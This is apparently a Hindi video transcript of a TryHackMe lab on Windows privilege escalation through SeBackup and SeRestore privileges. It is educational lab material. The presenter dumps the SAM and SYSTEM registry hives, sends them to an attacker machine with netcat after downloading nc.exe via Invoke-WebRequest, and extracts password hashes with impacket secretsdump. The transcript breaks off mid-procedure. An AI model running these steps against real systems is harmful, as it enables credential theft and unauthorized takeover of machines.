तो इस वीडियो में हम लोग सीखने वाले हैं कि विंडोज़ में यूज़र प्रिविलेजेस की मदद से प्रिविलेज एस्केलेशन कैसे करा जा सकता है। अब यहाँ पे आपको उससे पहले समझना पड़ेगा कि विंडोज़ में यूज़र प्रिविलेजेस का कॉन्सेप्ट क्या होता है। अब फॉर एग्जांपल मैं एक यूज़र हूँ, तो विंडोज़ में मेरे को स्पेसिफिक प्रिविलेजेस दिए जा सकते हैं कुछ काम करने के लिए। अब वो प्रिविलेजेस कैसे हो सकते हैं? वो प्रिविलेज ऐसे हो सकते हैं, फॉर एग्जांपल मैं एक विंडोज़ का यूज़र हूँ, ठीक है? आप एक बड़ी कॉर्पोरेशन में सोचो, एक बड़ी कंपनी में सोचो, मैं एक सिस्टम एडमिनिस्ट्रेटर हूँ और मेरा काम क्या है, या मैं डेटाबेस एनालिस्ट हूँ और मेरा काम क्या है कि एक सिस्टम में जाना और उसका बार बार बैकअप लेना, उसकी सारी फाइल्स का बैकअप लेना। तो मेरे को प्रिविलेजेस लगेंगे। लेकिन जो कंपनी है वो मुझे एडमिन का एक्सेस नहीं देना चाहती, वो मेरे को पूरा एक्सेस नहीं देना चाहती कंप्यूटर का। वो चाहती कि बस मैं सारी फाइल्स को पढ़ पाऊँ, मेरे पे सारी फाइल्स का रीड एक्सेस हो। तो ये कैसे हो सकता है? तो विंडोज में यहीं पे आते हैं यूजर प्रिविलेजेस। यानी कि यूजर को आप स्पेसिफिक प्रिविलेजेस दे सकते हो। या तो एक तरीका है कि मैं हर फाइल पे जाके उसको रीड की परमिशन दूं। अब ये बहुत ज़्यादा हो जाएगा, हर फोल्डर हर फाइल में जाके उसको रीड के प्रिविलेजेस देना बहुत मेहनत का काम है। उससे बढ़िया है कि उस सिंगल यूजर को हम ये परमिशन दे दें, ये प्रिविलेज दे दें कि आप इस सिस्टम पे सारी फाइल्स को पढ़ सकते हो। मैटर नहीं करता कि इस फाइल या इस फोल्डर की परमिशन क्या है। आपको हमने बोल दिया कि आपके पास रीड की प्रिविलेजेस है, तो आप किसी भी फोल्डर में किसी भी फाइल को रीड कर सकते हो। तो ये होते हैं प्रिविलेजेस। यानी कि एक यूजर को हम एक स्पेसिफिक प्रिविलेज दे सकते हैं जिससे वो काम कर पाए। अब ये प्रिविलेजेस कुछ भी हो सकते हैं, जैसे फॉर एग्जांपल शटडाउन का एक प्रिविलेज होता है कि हम इसको ये प्रिविलेज दे रहे हैं कि इस मशीन को शट डाउन कर सकता है। अब सर्वर्स पे ये प्रिविलेज बहुत इंपॉर्टेंट होता है। कल को कोई हैकर आएगा कोई गेस्ट यूजर की तरीके से और वो शट डाउन करके चला गया सर्वर को, तो आप इसे रिस्ट्रिक्ट भी कर सकते हो कि कौन इस सिस्टम को शट डाउन कर सकता है और कौन नहीं कर सकता। वैसे एक प्रिविलेज होता है रीड का प्रिविलेज, आप सिस्टम पे कोई भी फाइल को रीड कर सकते हो, कोई भी फाइल को। एक राइट का प्रिविलेज होता है, कोई भी फाइल पे राइट कर सकते हो, ओवरराइट कर सकते हो। ऐसे बहुत तरह के प्रिविलेजेस होते हैं। और विंडोज में एक बहुत इंपॉर्टेंट कॉन्सेप्ट होता है जो कि प्रिविलेजेस से जुड़ा हुआ है, जिसको हम कहते हैं टोकन्स। तो वो भी हम समझेंगे इस वीडियो में कि यूजर के टोकन्स क्या होते हैं विंडोज में, और कैसे हम प्रिविलेजेस की मदद से टोकन्स का यूज लेके प्रिविलेज एस्केलेशन कर सकते हैं। अब अगर आपको इसको कॉन्सेप्चुलाइज करना है, समझना है, तो आप इसको ऐसे लिंक कर सकते हो। अगर आपको लिनक्स अच्छे से समझ में आता है तो लिनक्स में भी सेम कॉन्सेप्ट है, उसका नाम है कैपेबिलिटीज। कैपेबिलिटीज भी लिनक्स में सेम चीज प्रोवाइड करती है कि अगर मेरे को एक यूजर को फुल एक्सेस नहीं देना, लेकिन एक बहुत स्पेसिफिक प्रिविलेज उसको मेरे को देना है कि वो सिस्टम पे कोई भी फाइल को रीड कर पाए, या सारी फाइल्स पे राइट कर पाए, या वो किसी भी फाइल पे एसयूआईडी को सेट कर पाए। तो इस वीडियो में हम उसको समझेंगे, यूजर प्रिविलेजेस को देखते क्या है, क्या कॉमन प्रिविलेजेस होते हैं और कैसे हम उनको एक्सप्लॉइट करके प्रिविलेज एस्केलेशन करते हैं। तो चलते सीधा अपनी स्क्रीन के ऊपर। तो मैं हूँ ट्राइहैकमी के विंडोज प्रिविलेज एस्केलेशन रूम के अंदर। इसकी इमेज को बहुत ध्यान से देख लो और इसके नाम को बहुत ध्यान से पढ़ लो, क्योंकि ट्राइहैकमी पे विंडोज प्रिविलेज एस्केलेशन के 3 या 4 रूम हैं। आपको ध्यान से इस वाले के अंदर आ जाना है। जब आप यहाँ पे आ जाओ तो आप लोगों को टास्क नंबर 6 पे चले जाना है। इसको ओपन कर लो, और इसको ओपन करने के बाद आपको स्टार्ट मशीन का बटन दिखेगा, इस बटन को क्लिक कर दो। बटन को क्लिक करने के 1 मिनट बाद आपको टारगेट की आईपी एड्रेस मिल जाएगी। जब आपको टारगेट की आईपी एड्रेस मिल जाए, उसके बाद आप नीचे स्क्रॉल करोगे तो आपको अपना पहला यूज़र नेम और पासवर्ड मिल जाएगा जिससे आप लॉगिन कर पाओगे। तो सबसे पहले मशीन के अंदर लॉगिन कर लेते हैं आरडीपी की मदद से। मैं यहाँ पे रेमेना का यूज़ लेने वाला हूँ, तो रेमेना का यूज़ ले लेते हैं। आईपी एड्रेस कॉपी कर लेते हैं, यहाँ पे आईपी डालेंगे, यस कर देंगे, और यहाँ पे हम दे देंगे THM बैकअप, और पासवर्ड में हम दे देंगे कॉपी मास्टर 555। ठीक है, अब हम यहाँ पे लॉगिन हो रहे हैं, इसको बड़ा कर लेते हैं। और यहाँ पे अभी हमारे को एक छोटे से बॉक्स में दिखेगा विंडोज़ की जो मशीन है, उसको बड़ा करने के लिए हम यहाँ पे डायनेमिक रेजोल्यूशन को अनेबल कर सकते हैं इस पर क्लिक करके, और इससे क्या होगा कि ये फुल स्क्रीन हो जाएगी पूरी विंडोज़। अब ये फुल स्क्रीन होने के बाद यहाँ से हम स्टार्ट कर सकते हैं। तो सबसे पहले मैं CMD ले लेता हूँ। अब CMD को ओपन करने के बाद यहाँ पे चलते हैं, और यहाँ पे मैं इसका साइज़ बड़ा कर लूँगा। तो प्रॉपर्टीज़ के अंदर जाएंगे और फॉन्ट फॉन्ट में इसका साइज़ 20 कर लेंगे। अब यहाँ पे आने के बाद अपने प्रिविलेज एस्केलेशन के वेक्टर पे बात करते हैं। तो यूज़र प्रिविलेजेस की जब हम बात करते हैं तो काफ़ी सारी यूज़र प्रिविलेजेस हो सकती है, लेकिन उनमें से हमारे काम की कुछ ही होती है। अब उन कुछ में से भी सबसे पहले तो आपको देखना आना चाहिए कि आपकी यूज़र प्रिविलेजेस है क्या, आपके यूज़र के पास क्या क्या प्रिविलेजेस है। तो उसके लिए हम यहाँ पे क्या काम करेंगे, हु एम आई,
ठीक है, तो ये हुआ मैं यूजुअली क्या बताता है, मेरा यूजर नेम, लेकिन ये आपके यूजर के प्रिविलेजेस भी बता सकता है अगर आप इसे एक ऑप्शन दोगे डैश प्रिव। ठीक है, तो यहाँ पे क्या बता रहा है कि मेरे कौन कौन से प्रिविलेजेस हैं। चेंज नोटिफाई प्रिविलेज और इंक्रीज वर्किंग सेट प्रिविलेज, ये दोनों ही मेरे काम के नहीं है। ठीक है, अब यहाँ पे आता है तो फिर हम प्रिविलेज एस्केलेशन करेंगे कैसे। तो हमारा जो पहला प्रिविलेज एस्केलेशन का वेक्टर होने वाला है, जो प्रिविलेज हम यूज करने वाले प्रिविलेज एस्केलेशन के लिए सबसे पहले, वो होने वाला है सी बैकअप और सी रिस्टोर। यहाँ पे जैसे लिखा है ना सी चेंज नोटिफाई प्रिविलेज, वैसे यहाँ पे आता है सी बैकअप और सी रिस्टोर, दोनों ही यहाँ पे हमारे को नहीं दिख रहा है। तो क्या इसका मतलब ये है कि हमारे पास वो प्रिविलेज नहीं है? ऐसा नहीं है। ठीक है, तो अब मैं क्या काम करूंगा, ये जो CMD है इसको यहाँ पे बंद करेंगे, दोबारा से CMD को सर्च करूंगा, राइट क्लिक करूंगा, रन एज एडमिनिस्ट्रेटर पे क्लिक करूंगा। ठीक है, ये मेरे से मेरे यूजर का पासवर्ड मांगेगा, यहाँ पे पासवर्ड डाल देते हैं। पासवर्ड डालने के बाद यस करेंगे यहाँ पे, और यहाँ पे हमारे को शेल मिल गया हु एम आई। अब यहाँ पे हम कुछ बात करते हैं। ठीक है, काफी लोगों को ना कुछ कंफ्यूजन रहता है इसको लेके कि जब मैं रन एज एडमिनिस्ट्रेटर कर रहा हूँ तो काफी लोगों को लगता है कि मैं एक्चुअली एडमिनिस्ट्रेटर का शेल ले रहा हूँ, तो उनको लगेगा कि प्रिविलेज एस्केलेशन की जरूरत ही क्यों है, मतलब हमारे पे तो ऑलरेडी एडमिनिस्ट्रेटर का राइट मिल चुका है ना हमारे को। ऐसा नहीं होता। रन एज एडमिनिस्ट्रेटर का मतलब कभी भी, उसका नाम गलत है। ठीक है, उन्हें पता नहीं क्यों माइक्रोसॉफ्ट वालों ने उसका नाम रख रखा है रन एज एडमिनिस्ट्रेटर, लेकिन रन एज एडमिनिस्ट्रेटर का मतलब ये कभी नहीं होता कि आप उसको एडमिनिस्ट्रेटर की तरह रन कर रहे हो। बस उसका ये मतलब होता है, देखो विंडोज का बहुत सिंपल है, विंडोज ये चाहता है कि एक सेपरेशन बना रहा है, यानी कि यूजर को पता रहे कि वो कर क्या रहा है। तो विंडोज क्या करता है अपने CMD में कि वो आपको आपके सारे जो आपका ट्रू पोटेंशियल है, आप क्या क्या कितना पावरफुल हो, वो आपको डायरेक्टली नहीं दिखाता। अगर आपको वो देखना है तो उसके लिए आपको जो CMD है उसको रन एज एडमिनिस्ट्रेटर में खोलना पड़ेगा, तब वो आपको आपकी ही यूजर, अभी भी देखो हु एम आई में मैं सेम ही यूजर हूँ, ऐसा नहीं मेरे को यहाँ पे बोल रहा कि मैं एडमिनिस्ट्रेटर बन गया हूँ, लेकिन अब वो मेरे फुल प्रिविलेजेस दिखाएगा, अब मेरी फुल पावर वो दिखाएगा। ठीक है, तो यहाँ पे अगर मैं करूँ हु एम आई और उसके बाद मैं यहाँ पे दे दूँ प्रिव, तो आपको दिखेगा यहाँ पे कुछ नए प्रिविलेजेस आ गए जो पहले नहीं दिख रहे। तो ये फर्क होता है कि अगर आप एक नॉर्मल CMD को ओपन करते हो और CMD को रन एज एडमिनिस्ट्रेटर करते हो, तो इसका ये मतलब नहीं कि जब आप रन एज एडमिनिस्ट्रेटर करते हो तो आप एडमिनिस्ट्रेटर यूजर बन गए। उसका ये मतलब होता है कि CMD जो होता है पहले जो रन करता है ना, वो कम पावर्स के साथ रन करता है, और वो जान के विंडोज ने कर रखा है ताकि आप गलती से कुछ गलत ना कर दो। अगर आपको सही में कुछ पावरफुल करना है, आपने कुछ ऐसा ओवरराइट कर दिया या डिलीट कर दिया, तो वो दिक्कत होगी। तो वो कहता है कि आपको पता है आप क्या कर रहे हो, तो एक बार मुझे रन एज एडमिनिस्ट्रेटर पे क्लिक करो, तब मैं बताऊंगा कि आपके क्या क्या पावर है, आप क्या क्या कर सकते हो। इसलिए वो ये लाता है। जो बीच में एक स्क्रीन आती है जो हमसे यूजर नेम और पासवर्ड मांगती है, जिसमें अभी हमने डाला अपने यूजर नेम और पासवर्ड, उसे हम UAC बोलते हैं, यूजर अकाउंट कंट्रोल। और ये बहुत कॉमन है, काफी लोगों को पता होगा इसके बारे में। अब आप लोगों ने देखा होगा जब भी आप रन एज एडमिनिस्ट्रेटर करते हो, कई बार वो यस और नो मांगती है कि डू यू वांट टू रन दिस एज एडमिनिस्ट्रेटर, ये यस या नो, ऐसे भी वो बोलती है। ठीक है, उसे UAC बोलते हैं। अब काफी लोगों को लगता है कि वो कोई एक सिक्योरिटी प्रोटेक्शन है। कभी भी UAC को आपको सिक्योरिटी प्रोटेक्शन के तौर पे नहीं देखना। कभी भी माइक्रोसॉफ्ट ने भी उसको ये सोच के नहीं बनाया था विंडोज के लिए कि वो एक सिक्योरिटी प्रोटेक्शन है, बल्कि वो एक अवेयरनेस के लिए कि आपको पता है आप क्या करने वाले हो। वो आपसे इसलिए मांगता है पासवर्ड। जैसे फॉर एग्जांपल आप काफ़ी सारी वेबसाइट में जब अपना अकाउंट डिलीट करने लगते हो या गिटहब पे जाओगे, अपनी रिपोजिटरी डिलीट करने लगोगे अपने अकाउंट, तो वो बोलता है कि मुझे डिलीट टाइप करके दो, पहले पेस्ट काम नहीं करता वहाँ की, कॉपी पेस्ट कर दो, तो आपको लिखना पड़ता है डिलीट, ताकि वो गिटहब आपको कह रहा है कि आपको पता है ना, आप बटन पे तो क्लिक कर रहे हो, लेकिन इससे होगा क्या आपको ये अंदाजा भी है। वैसे ही यहाँ पे UAC जो आता है वो हमारे को ये नहीं है कि इसको ऐसे मत सोचना कि वो सिक्योरिटी है, उसको बाईपास करना चाहिए। बाईपास भी करना पड़ता है कई बार, UAC ब्लॉक कर देता है, UAC हमसे एडमिन का पासवर्ड मांग लेता है, ये सारी चीज़ें हो सकती हैं। ठीक है, पर UAC कभी भी एक सिक्योरिटी के पर्सपेक्टिव से नहीं बना कि वो इसलिए बना हो कि हैकर्स को ब्लॉक कर दे, पर वो इसलिए बना स्पेसिफिकली ताकि वो आपको ये याद दिला पाए कि आप करने क्या वाले हो, आपके दिमाग में एक आइडिया डालने के लिए कि इससे क्या क्या हो सकता है। ठीक है, तो यहाँ पे हमने UAC के बाद हमने रन एज एडमिनिस्ट्रेटर करा। अब ये हमारे को हमारा ट्रू पोटेंशियल दिखा रहा है कि हम कितने पावरफुल है, हमारे पे क्या क्या प्रिविलेजेस है। तो हम पे यहाँ पे ना 2 स्पेशल प्रिविलेजेस दिख रही है, और एक्चुअली तीसरी भी आ गई शटडाउन की भी, कि हम शट डाउन कर सकते हैं सिस्टम को, बहुत बड़ी बात नहीं है। पर यहाँ पे 2 प्रिविलेज नहीं हमारे को दिख रही है जो इंपॉर्टेंट है, सी बैकअप प्रिविलेज और सी रिस्टोर प्रिविलेज। अब एक और चीज़ बहुत लोगों को लगता है कि यहाँ पे जो स्टेट है वो डिसेबल्ड है, तो उन लोगों को लगता है कि स्टेट डिसेबल्ड है इसका मतलब हम इसको यूज़ नहीं कर सकते, ये हमारे यूज़र के लिए नहीं है। ऐसा बिल्कुल नहीं होता। जो भी प्रिविलेज जब आप हुए में प्रिव करते हो, जो भी प्रिविलेज लिस्ट हो रही है वो सारी आपको दी गई हैं, वो सारी आपके पास प्रिविलेजेस हैं। स्टेट यहाँ पे मायने नहीं रखती। ठीक है, आप लोगों के लिए स्टेट मायने नहीं रखती, इसको इग्नोर करा करो। स्टेट बेसिकली इतना बोल रही है कि क्या वो सर्विस अभी अनेबल्ड है या डिसेबल्ड है, और सर्विस को
यूज़ करने से पहले आपको इसको अनेबल करना पड़ेगा, और अनेबल आप कर सकते हो, मतलब वो अनेबल करना कोई बहुत बड़ी बात नहीं है, अनेबल ऑटोमेटिकली हो जाती है, कोई ऐसी प्रॉब्लम नहीं है। तो बस ये बता रही है कि ये अभी सर्विस डिसेबल्ड है। तो फ़र्क इतना होता है कि अगर कोई सर्विस अनेबल्ड है तो आप उसे डायरेक्टली यूज़ कर सकते हो, और अगर कोई सर्विस डिसेबल्ड है तो पहले आपको उसको अनेबल करना पड़ता है और फिर आप उसे यूज़ कर पाते हो। और ऐसा नहीं कि अनेबल से उसके लिए एडमिन एक्सेस लगेगा, कुछ कोई भी अनेबल कर सकता है, तो कोई भी इन द सेंस आप अपनी कोई भी प्रिविलेज को अनेबल कर सकते हो विदाउट एडमिन राइट्स। तो इसका कोई मैटर नहीं करता, मतलब स्टेट को आप इग्नोर कर सकते हो, स्टेट हमारे लिए मैटर नहीं करती। जो भी प्रिविलेजेस यहाँ लिस्ट हो रहे हैं वो सब आपके पास है। अब समझते हैं कि दो प्रिविलेज है क्या जिनसे हमारे को प्रिविलेज एस्केलेशन मिलने वाला है। तो सी बैकअप और सी रिस्टोर प्रिविलेज ये करते क्या? तो सी बैकअप और सी रिस्टोर बेसिकली आपको रीड और राइट का एक्सेस देते हैं। तो सी बैकअप ये कहता है कि आपके पास अगर ये प्रिविलेज है तो आप इस सिस्टम पे कोई भी फाइल को पढ़ सकते हो, मतलब आपके पास वो फाइल में लिखा है कि ये वाला यूज़र, इसको मेरे जो यूज़र है टीएचएम यूज़र, टीएचएम बैकअप यूज़र, इसको ये फाइल पढ़ना अलाउड नहीं है, तो भी मैं उसको पढ़ पाऊंगा। बेसिकली अगर मेरे पास ये प्रिविलेज है तो मैं पूरे सिस्टम पे कोई भी फाइल को पढ़ सकता हूँ। ठीक है, पूरे सिस्टम पे किसी भी फाइल को पढ़ सकता हूँ, हर फाइल पे रीड का एक्सेस है मेरे पास, आप ये समझो विदाउट रिस्ट्रिक्शंस। तो आपको समझ आ रहा होगा, ये तो बहुत ही आसान है इससे प्रिविलेज एस्केलेशन करना। मतलब मैं सीधा पासवर्ड हैशेस पढ़ सकता हूँ, मैं कुछ भी पढ़ सकता हूँ, सैम डेटाबेस, कोई भी रजिस्ट्री पढ़ सकता हूँ, कोई कितनी भी सेंसिटिव फाइल हो सिस्टम पे मैं सब पढ़ सकता हूँ इसकी मदद से। ठीक है, दूसरा होता है सी रिस्टोर। यहाँ पे हमारे को दोनों, ऐसा हो सकता है किसी मशीन में खाली प्रिविलेज एस्केलेशन के लिए ये दिया हो, ऐसा हो सकता है किसी मशीन पे खाली प्रिविलेज एस्केलेशन के लिए ये दिया हो, यहाँ पे दोनों दिया। ठीक है, सी रिस्टोर जस्ट इसी की तरह होता है, पर ये कहता है आपके पास फुल राइट एक्सेस है पूरे सिस्टम पे, आप किसी भी फाइल पे कुछ भी राइट कर सकते हो उठा के। ये भी खतरनाक है ऑफ कोर्स, है ना। आप इजीली समझ सकते हो, मतलब मैं कुछ भी राइट कर सकता हूँ, तो मैं कहीं पे कुछ भी राइट कर सकता हूँ, और बहुत इजी है इससे प्रिविलेज एस्केलेशन करना। आप किसी भी सर्विस को ओवरराइड कर सकते हो, कोई सर्विस की बाइनरी फाइल है, मतलब कोई सर्विस रन कर रही है एज सिस्टम यूजर, तो उसकी जो EXE है मैं उसको ओवरराइड कर सकता हूँ। कोई स्टार्टअप फोल्डर के अंदर फाइल पड़ी है जो ऑटोमेटिकली एडमिन यूजर एग्जीक्यूट करता है, मैं उसको ओवरराइड कर सकता हूँ। किसी स्केड्यूल टास्क, पूरे सिस्टम पे कुछ भी ओवरराइड कर सकता हूँ। तो ये भी एक अच्छी चीज़ है जो हम प्रिविलेज एस्केलेशन के लिए यूज़ कर सकते हैं। ठीक है, इनको देखते हैं यहाँ पे कैसे इनका एक्सप्लॉइटेशन करा जा सकता है। अब यहाँ पे आते हैं, सबसे पहले सी बैकअप का सबसे सिंपल तरीका जो है ना, सबसे सिंपल आप करने का, आप क्योंकि कोई भी फाइल पढ़ सकते हो, कोई भी रजिस्ट्री कुछ भी पढ़ सकते हो पूरे सिस्टम पे, तो हम क्या काम करेंगे, यहाँ पे एक रजिस्ट्री को सेव कर लेंगे। ठीक है, आप फाइल भी सेव कर सकते हो। हमने पढ़ा था कि जो सैम डेटाबेस होता है वो सी विंडोज़ के अंदर सिस्टम 32 के अंदर कॉन्फ़िग के अंदर सैम और सिस्टम फाइल पड़ी रहती है। और मैंने पासवर्ड वाली उसी वीडियो में ये भी बताया था कि वो रजिस्ट्रीज के अंदर भी रहती है, सैम और जो सिस्टम है वो रजिस्ट्रीज के अंदर भी होता है, तो वहाँ से भी आप इनको पढ़ सकते हो। तो यहाँ पे मैं क्या काम करूँगा, रजिस्ट्रीज की मदद से REG, तो पहले मैं ढंग के फोल्डर में चला जाऊँगा थोड़ा सा पहले, जहाँ से मैं इन फाइल्स को ट्रांसफ़र भी कर पाऊँ, क्योंकि सिस्टम 32 में हूँ बेबी। तो सी यूज़र, इसमें यूज़र का नाम क्या है, THM बैकअप, यहाँ आ गए। ठीक है, अब मैं यहाँ से क्या काम करूँगा, यहाँ पे लिखते हैं रेग सेव, सेव कर लेंगे एक रजिस्ट्री को, मतलब उसको एक कॉपी बना के फाइल में सेव कर लेंगे। कौन सी रजिस्ट्री, HKLM लोकल मशीन के अंदर, बहुत सिंपल। एक रजिस्ट्री होती है कौन सी, सैम। ठीक है, इसको मैं यहाँ पे रख लूँगा, और इसको जो भी फाइल का नेम देना है, जो भी रखना है, तो मैं इसका नाम रख लूँगा सैम ही नाम से, इसको सेव कर लूँगा। ये हो गया कंप्लीट। देखो अब सैम जो है उसको कोई भी उठ के ऐसा एरा गैरा कोई नहीं पढ़ सकता उसको, लेकिन क्योंकि आपके पास बैकअप प्रिविलेज थे तो आप किसी भी फाइल को, किसी भी रजिस्ट्री को, सब कुछ पूरे सिस्टम पे कुछ भी पढ़ सकते हो, इसीलिए ये प्रिविलेज इंपॉर्टेंट हो जाते हैं। ठीक है, अब यहाँ पे आते हैं, और अब मैं सिस्टम को भी सेव कर लेता हूँ, सिस्टम और सिस्टम इसको भी सेव कर लेता हूँ, और अब मैं डिर करूँगा तो सैम और सिस्टम को मैंने यहाँ पे सेव कर लिया, ये रही सिस्टम, ये रही सैम फाइल। बस अब मेरे को इसको अपने सिस्टम पे लोकली ट्रांसफ़र करना है। ट्रांसफ़र करने के बाद मैं इनकी मदद से पासवर्ड हैशेस को निकाल पाऊंगा, इतना सिंपल काम होता है। ठीक है, अब यहाँ पे सबसे पहले इनको ट्रांसफ़र करने से पहले हमारे को एक काम करते हैं, आज नेटकैट को इधर लेके आते हैं। तो मैं आपको एक नया तरीका भी सिखा दूंगा ट्रांसफ़र का, और नेटकैट से कैसे फाइल ट्रांसफ़र कर सकते हैं। नेटकैट हमेशा हैंडी आपके पास रहनी चाहिए, तो वो हमारे को दिख जाएगा एक फाइल ट्रांसफ़र का तरीका, कि यहाँ से मेरे सिस्टम पे फाइल कैसे जा सकती है। हमने SMB, FTP, HTTP काफ़ी सारे तरीके देख लिए। आज नेटकैट की मदद से, रॉ TCP की मदद से कैसे पैकेट्स से मदद से फाइल्स को ट्रांसफ़र कर सकते हैं, वो यहाँ पे हम देखेंगे। तो सबसे पहले ब्राउज़र पे चलते हैं, नेटकैट को डाउनलोड कर लेते हैं। अब ब्राउज़र पे आने के बाद ना आपको बहुत सिंपल लिखना है nc.exe डाउनलोड गिटहब, ये आ गया यहाँ पे, इसको ओपन कर लेंगे। ठीक है, इसको ओपन करने के बाद यहाँ पे आपको मिल जाएगी nc.exe या 64 वर्जन, हम 64 को कर लेंगे। और देखो ये 8 साल पुरानी है और आज तक भी ये मतलब लेजेंडरी है ये। तो इसको यहाँ पे हम कर लेते हैं
डाउनलोड, और ये हमारी फाइल यहाँ पे डाउनलोड हो गई। शायद मेरे पे पहले से पड़ी हुई थी, कोई दिक्कत नहीं है। वापस अपने टर्मिनल पे चलता हूँ। अब यहाँ आने के बाद मैं क्या काम करूँगा, मूव कर लूँगा डाउनलोड्स फोल्डर से nc64.exe को यहाँ पे, इसको मूव करके nc, मैंने पहले भी कर सकता था पर मैंने करा नहीं, nc.exe कर लेंगे इसका नाम, और python 3-m http.server, और 80 एक सर्वर स्टार्ट करेंगे इसको ट्रांसफर करने के लिए। वापस चलते हैं अपनी RDP वाली मशीन के अंदर। अब यहाँ नहीं करना, क्योंकि मेरे को आपको एक नया तरीका सिखाना है पहले ट्रांसफर का। अभी नेटकेट से भी सीखेंगे, पर नेटकेट के अलावा भी एक नया सिखा देता हूँ। हर बार मैं नया ही सिखा रहा हूँ, मैं कोई भी मेथड को रीयूज नहीं कर रहा हूँ किसी भी वीडियो में, ताकि आपको बहुत सारे नए मेथड मिल जाए। तो हमने कर्ल देख लिया है, डब्ल्यूगेट भी देखा था पावर शेल की मदद से, सर्टयूटिल देखा था। तो आज हम एक दूसरा तरीका देख लेते हैं जिससे इन फाइल्स को ट्रांसफर कर सकते हैं, जो कि होने वाला है इन्वोक वेब रिक्वेस्ट। ठीक है, और टैब काम क्यों नहीं कर रहा है, मैंने गलत लिखा है क्या, वेब रिक्वेस्ट आ गया। थोड़ा टाइम लगता है इसको कंप्लीट होने में, इन्वोक वेब रिक्वेस्ट। उसके बाद डैश URI का ऑप्शन देंगे, और यहाँ पे अपनी URL दे देंगे जिससे डाउनलोड करना है, http 192.168.179.176, और यहाँ पे हम दे देंगे nc.exe, और जिसमें सेव करना है वो यहाँ पे ऑप्शन दे देंगे आउट फाइल का, जैसे हमने यही सेम ऑप्शन wget में भी देते हैं। तो आउट फाइल, और यहाँ पे हम दे देंगे nc.exe। एंटर मारते हैं, यहाँ पे कुछ गलती कर दी, आउट फाइल की स्पेलिंग गलत कर दिया मैंने, आउट फाइल, एंटर मारते हैं एंड डन। तो मैं डर करके एक बार देख लेता हूँ, और हमारी netcat.exe हमारे पास आ चुकी। ठीक है, अभी नेटकेट काफ़ी काम की, क्योंकि हमारे को शेल देने में भी हेल्प करेगी, फाइल ट्रांसफर में भी हेल्प करेगी। तो ये नेटकेट यहाँ पे आ गया। अब यहाँ पे हम क्या काम करेंगे, इन फाइल्स को हमारे को ट्रांसफ़र करना है। तो सबसे पहले मैं क्या काम करूँगा, इसको कर देते हैं यहाँ पे वापस CMD पे चल लेते हैं। तो बहुत छोटा दिख रहा है और मैंने बड़ा भी नहीं करा आप लोगों के लिए, तो कोई दिक्कत नहीं है। यहाँ पे हम वापस आते हैं। अब यहाँ पे मैं क्या काम करूँगा, नेटकेट का कमांड पहले लिख लेते हैं यहाँ पे nc। उसके बाद मैं यहाँ पे IP दूंगा 192.168.179.176। एक कोई पोर्ट ले लेंगे जैसे 4444, और मैं इसे क्या बोलूँगा यहाँ पे, अब देखो मैं उल्टा रीडायरेक्शन का साइन दे रहा हूँ। ठीक है, और मैं यहाँ पे बोलूँगा सैम। तो मैं इसे बोल रहा हूँ कि सैम फाइल को पढ़ो, और जो इसका सारा डेटा है वो यहाँ से ट्रांसफ़र कर दो सारा, कहाँ पे, इस वाले कनेक्शन पे। और एक वहाँ पे हम कनेक्शन तैयार कर देते हैं, और ये सारी फाइल को ट्रांसफ़र कर देगा। कितना सिंपल नेटकेट से आप फाइल ट्रांसफ़र कर सकते हो। वापस अपने टर्मिनल पे चलते हैं। अब यहाँ आने के बाद इसको बंद करेंगे, और यहाँ पे आने के बाद मैं क्या काम करूँगा, नेटकेट का कमांड लिखूँगा nc-nvlp4444, और यहाँ पे इसको रीडायरेक्ट कर देंगे सैम नाम की फाइल। जो भी यहाँ से डेटा आने वाला है वो रीडायरेक्ट हो जाए सैम नाम की फाइल के अंदर। एंटर मारते हैं यहाँ पे, वापस चलते हैं RDP के अंदर। अब यहाँ आने के बाद में एंटर मारते हैं यहाँ पे, और हमारी जो फाइल है वो वहाँ पे ट्रांसफ़र हो जाएगी। वापस चलते हैं, और वहाँ पे आपको दिखेगा सैम फाइल क्रिएट हो चुकी होगी। ठीक है, हमारे पे यहाँ पे कनेक्शन भी आ गया। अब मैं इसको Ctrl+C कर देता हूँ बंद करने के लिए, LS करते हैं, और LA करते हैं चेक करने के लिए, और सैम यहाँ पे पूरी क्रिएट हो चुकी है हमारी सैम फाइल। सेम सिस्टम के लिए करेंगे, तो यहाँ पे मैं नेटकेट को बोल देता हूँ कि भैया सिस्टम फाइल आने वाली है, तो जो भी अब डेटा आएगा तेरे पे वो सिस्टम फाइल के अंदर स्टोर कर ले, सिस्टम। ठीक है, वापस चलते हैं RDP के अंदर। अब यहाँ निकल सेम तरीका, बस अब मैं इसको बोलूँगा कि सिस्टम फाइल, तो सिस्टम फाइल को रीड करे। ठीक है, उसका जितना भी डेटा है वो इस यहाँ पे नेटकेट से कनेक्ट करके सारा डेटा वहाँ पे ट्रांसफ़र कर दे। ठीक है, एंटर मारते हैं यहाँ पे इसको, और अब वापस चलते हैं अपने काली पे, वहाँ पे सिस्टम फाइल आ चुकी होगी। अब हम यहाँ पे आ गए। अब आपको एक चीज़ याद रखनी, क्योंकि वो फाइल काफ़ी बड़ी थी, साइज़ में काफ़ी बड़ी होती है सिस्टम फाइल, तो थोड़ा सा इसको टाइम देना। ऐसा मतलब एकदम आप आके वो Ctrl+C मार दोगे तो ऐसा हो सकता है कि आधा ही ट्रांसफ़र कंप्लीट हुआ और ये कोई प्रोग्रेस बार वगैरह नहीं देता। तो थोड़ा सा इसको टाइम देना, 1-2 मिनट, उतने में ये कंप्लीट हो जाएगा। कंप्लीट होने के बाद फिर आप इसको Ctrl+C मार सकते हो, तब तक डेटा ट्रांसफ़र लगभग हो गया होगा। ठीक है, Ctrl+C करते हैं, LS-LA करते हैं, यहाँ पे ये सारा डेटा आ गया है। अब बस हमारे को इसको इम्पैकेट की मदद से पढ़ लेंगे इसका सारा। तो इम्पैकेट सीक्रेट्स डंप लोकल डैश सैम में सैम फाइल दे देंगे, और डैश सिस्टम में सिस्टम फाइल दे देंगे। एंटर मारते हैं, और मैंने यहाँ पे कुछ गड़बड़ कर दी, कैपिटल दे दिया ये सारा सिस्टम। एक मिनट, सिस्टम, एंटर मारते हैं। तो हमने एक गड़बड़ कर दिया यहाँ पे। ये एरर आने का मतलब क्या है कि अभी सिस्टम फाइल पूरी नहीं हुई थी और मैंने बंद कर दिया पहले ही। तो ये मैं बता रहा था कि जो गलती मैं कर सकता हूँ वो आप भी कर सकते हो। तो इसलिए दोबारा से सिस्टम को ट्रांसफ़र कर लेते, कोई प्रॉब्लम की ऐसी बात नहीं है। यहाँ पे वापस करते हैं, वापस विंडोज़ पे चलते हैं, 